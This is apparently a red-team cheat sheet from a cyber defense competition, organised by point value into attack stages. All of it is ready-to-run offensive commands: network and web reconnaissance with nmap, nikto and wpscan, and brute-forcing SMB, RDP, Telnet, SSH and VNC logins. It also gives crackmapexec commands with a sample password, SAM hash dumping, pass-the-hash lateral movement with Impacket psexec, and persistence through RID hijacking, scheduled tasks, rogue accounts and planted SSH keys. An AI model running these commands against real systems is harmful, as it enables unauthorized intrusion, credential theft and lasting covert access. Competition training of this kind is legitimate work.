GrayHats-PRCCDC

Windows

WebApp

Linux

FTP

SMB

100

RECON for AD and other VULNS

(optional) UDP scan: nmap -sU -F -Pn -v -d -sC -sV --open --reason -T5 <targets>

(Domain controller, SMB services, HTTP, Exchange) nmap -T4 -p21,22,23,25,53,80,137,139,443,445 <TARGET/24> -oA rec.txt cat rec.txt | grep "open"

crackmapexec smb 192.168.223.13 -u Administrator -p ~/Desktop/Initial/2_Pass_PRCCDC2019

100

RECON Web

perl nikto.pl -h [path-to-greppable-nmap-file] -p 80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,5800,5988,5989,7000,7001,7002,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092

nmap -sS -A -T4 --open --reason -oA target_system --webxml -p- <YOUR_IP_of_TargetHERE>

kali@root:~# git clone https://github.com/wpscanteam/wpscan

kali@root:~# wpscan <your_WP_Website_IPHERE>

100

Linux RECON

nmap -sC -sV -p22

Get em all

nmap -sV --open -T4 -v7 -p80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,5800,5988,5989,7000,7001,7002,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092 -iL live-hosts.txt -oA web

100

RECON for FTP

nmap -sC -sV -p21

100

RECON for SMB

nmap --script=smb-enum-shares -p445

200

INITIAL ACCESS

VNC:

nmap --script=vnc-brute -p5800,5900

SMB Brute:

medusa -h <host.ip> -u <account.name> -P /path/to/wordlist -M smbnt

RDP Brute Force:

ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Telnet BruteForce:

medusa -h <tehost.ip> -u <account.name> -P /path/to/wordlist -M telnet

medusa -M telnet -C /usr/share/wordlists/telnet.lst -H 23.txt -T 10 -t 3| grep SUCCESS |tee medusa-results.txt

200

INITIAL ACCESS

SSH BruteForce:

medusa -M ssh -C /usr/share/wordlists/ssh.lst -H 22.txt -T 10| grep SUCCESS |tee medusa-results.txt

VNC

nmap --script=vnc-brute -p5800,5900

300

Lateral Move

crackmapexec smb 192.168.223.13 -u Administrator -p ~/Desktop/Initial/2_Pass_PRCCDC2023

Grab admin hash:

crackmapexec smb 192.168.223.13 -u administrator -p 'P@$$word1' -d pets.local --sam

Use Impacket to psexec to another box with hash:

python psexec.py -hashes :<PUT-YOUR-HASH-HERE> administrator@<TARGET>

400

PERSISTENCE (staying on the system)

Guest account to Admin:

use post/windows/manage/rid_hijack

Add schtasks

Add user account

400

PERSITENCE (Stay on the box)

Add your public keys to Authorized_Keys